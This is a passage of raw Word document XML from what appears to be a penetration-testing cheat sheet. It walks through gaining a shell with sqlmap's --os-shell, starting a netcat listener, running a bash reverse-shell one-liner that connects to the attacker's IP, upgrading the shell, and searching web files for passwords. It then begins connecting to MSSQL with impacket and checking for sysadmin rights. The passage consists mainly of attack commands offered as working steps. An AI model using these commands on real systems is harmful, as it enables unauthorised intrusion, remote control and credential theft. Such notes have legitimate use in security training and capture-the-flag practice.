                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--os-shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidRPr="00C933E4">
              <w:t>(One command)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00FC7E9F">
              <w:t>You may have gotten a shell using the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> --os-shell </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC7E9F">
              <w:t>switch</w:t>
            </w:r>
            <w:r>
              <w:t>!</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Especially if sqlmap informs us that it is a backend DBMS using PostgreSQL and the search parameter is vulnerable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6F98" w14:paraId="62DF4D19" w14:textId="77777777" w:rsidTr="007118F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0376C935" w14:textId="303413DC" w:rsidR="000B6F98" w:rsidRDefault="007118F6" w:rsidP="000B6F98">
            <w:r>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="000B6F98">
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7F11A348" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62B207BA" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:t>Now, if the --os-shell gets us a shell inside the machine, we should set up a netcat:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-lvnp </w:t>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Then, on the os-shell (via sqlmap), we can use: </w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>'bash -i &gt;&amp; /dev/tcp/</w:t>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>YOUR.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">4444 </w:t>
            </w:r>
            <w:r w:rsidRPr="002B5285">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>0&gt;&amp;1'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00AC4A74">
              <w:t>Then, check over on the netcat listener and you should have made a connection</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6F98" w14:paraId="52FFB76F" w14:textId="77777777" w:rsidTr="007118F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B9DB2D1" w14:textId="329E75CE" w:rsidR="000B6F98" w:rsidRDefault="007118F6" w:rsidP="000B6F98">
            <w:r>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="000B6F98">
              <w:t>.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5BE1C3A1"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7F1AF12B" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:t>Once a reverse shell has been opened on your netcat listener, use:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47A2FE39" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRPr="00622988" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C933E4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> SHELL=/bin/bash script</w:t>
            </w:r>
            <w:r w:rsidRPr="00C933E4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C933E4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-q</w:t>
            </w:r>
            <w:r w:rsidRPr="00C933E4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C933E4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/dev/null</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Inside as a user, we can search for our password. If </w:t>
            </w:r>
            <w:r w:rsidRPr="00622988">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/var/www/html</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> directory exists, you may be able to find </w:t>
            </w:r>
            <w:r w:rsidRPr="00622988">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">dashboard.php </w:t>
            </w:r>
            <w:r>
              <w:t>within it, especially if there is a webserver.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Cat out </w:t>
            </w:r>
            <w:r w:rsidRPr="00622988">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">dashboard.php </w:t>
            </w:r>
            <w:r>
              <w:t>and look through the source code to find a password!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6F98" w14:paraId="6C3D9276" w14:textId="77777777" w:rsidTr="007118F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="372CF84A" w14:textId="417B4F77" w:rsidR="000B6F98" w:rsidRDefault="007118F6" w:rsidP="000B6F98">
            <w:r>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="000B6F98">
              <w:t>.i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="533DF5FD" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B12D337" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:t xml:space="preserve">Now, if on a Linux machine, use </w:t>
            </w:r>
            <w:r w:rsidRPr="00622988">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo </w:t>
            </w:r>
            <w:r w:rsidRPr="00622988">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to see a list of user privileges. This will ask for the user password however.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6F98" w14:paraId="525E5F7A" w14:textId="77777777" w:rsidTr="007118F6">
        <w:trPr>
          <w:trHeight w:val="63"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="11289C86" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRPr="002B5285" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="6"/>
                <w:szCs w:val="6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5E098AA2" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRPr="002B5285" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:rPr>
                <w:sz w:val="6"/>
                <w:szCs w:val="6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F184D68" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRPr="002B5285" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="6"/>
                <w:szCs w:val="6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C3D72FC" w14:textId="00DDE04D" w:rsidR="002E1AE7" w:rsidRPr="00701BF4" w:rsidRDefault="00701BF4" w:rsidP="00701BF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="002E1AE7">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A7D534" w14:textId="7D627B47" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="002E1AE7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mssqlclient.py (impacket)</w:t>
      </w:r>
      <w:r w:rsidR="00AA7D8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | raptor_udf2.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00651373" w14:textId="77777777" w:rsidR="00BB6872" w:rsidRDefault="00BB6872"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:tblpY="884"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2386"/>
        <w:gridCol w:w="8030"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E1AE7" w14:paraId="3ECFC853" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1A29AE73" w14:textId="2588C14F" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C16373C" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>mssqlclient.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B51E140" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F3B0FAB" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRPr="001F411D" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F411D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Must have Impacket unpacked and installed; check 1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f</w:t>
            </w:r>
            <w:r w:rsidRPr="001F411D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> for more about getting impacket installed and ready)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77D4EE88" w14:textId="3D764036" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r w:rsidRPr="00520A0D">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve">IF THERE IS AN SQL SERVER (port </w:t>
            </w:r>
            <w:r w:rsidR="00E82ED3">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>1433</w:t>
            </w:r>
            <w:r w:rsidRPr="00520A0D">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>), OTHERWISE SKIP</w:t>
            </w:r>
            <w:r w:rsidR="00520A0D" w:rsidRPr="00520A0D">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Don’t forget to have impacket fully installed)</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>If there is an SQL server, identifiable via nmap scanning, we can try connecting using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">mssqlclient.py </w:t>
            </w:r>
            <w:r w:rsidRPr="002E1AE7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USERNAME</w:t>
            </w:r>
            <w:r w:rsidR="00852761">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/SQL_NAME:PASSWORD</w:t>
            </w:r>
            <w:r w:rsidRPr="00A873CC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidRPr="002E1AE7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="002E1AE7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="002E1AE7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ADD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="002E1AE7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>RESS</w:t>
            </w:r>
            <w:r w:rsidR="00852761">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00852761">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A873CC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-windows</w:t>
            </w:r>
            <w:r w:rsidR="00852761">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A873CC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-auth</w:t>
            </w:r>
            <w:r w:rsidR="00852761">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00852761">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00852761">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00852761" w:rsidRPr="00852761">
              <w:t>(All one command)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0074122B">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="0074122B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">If </w:t>
            </w:r>
            <w:r w:rsidRPr="00A873CC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>this doesn’t seem to be working, check .</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>g</w:t>
            </w:r>
            <w:r w:rsidRPr="00A873CC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> below…</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="2463C9FD" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4444E7CD" w14:textId="082A9A6F" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="227D8089" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43B8D22C" w14:textId="0C08D725" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r>
              <w:t>If we gain access, we first need to check if we have administrator privileges, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A873CC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="002E1AE7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">IS_SRVROLEMEMBER </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>(‘</w:t>
            </w:r>
            <w:r w:rsidRPr="002E1AE7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>sysadmin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>’)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="06F18BB4" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2348A6E2" w14:textId="121D9A94" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3536F9E1" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="191CF50C" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r>
              <w:t>If we return with a line, followed by the number 1, then we certainly do have system administrator privilieges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="4D3453A7" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
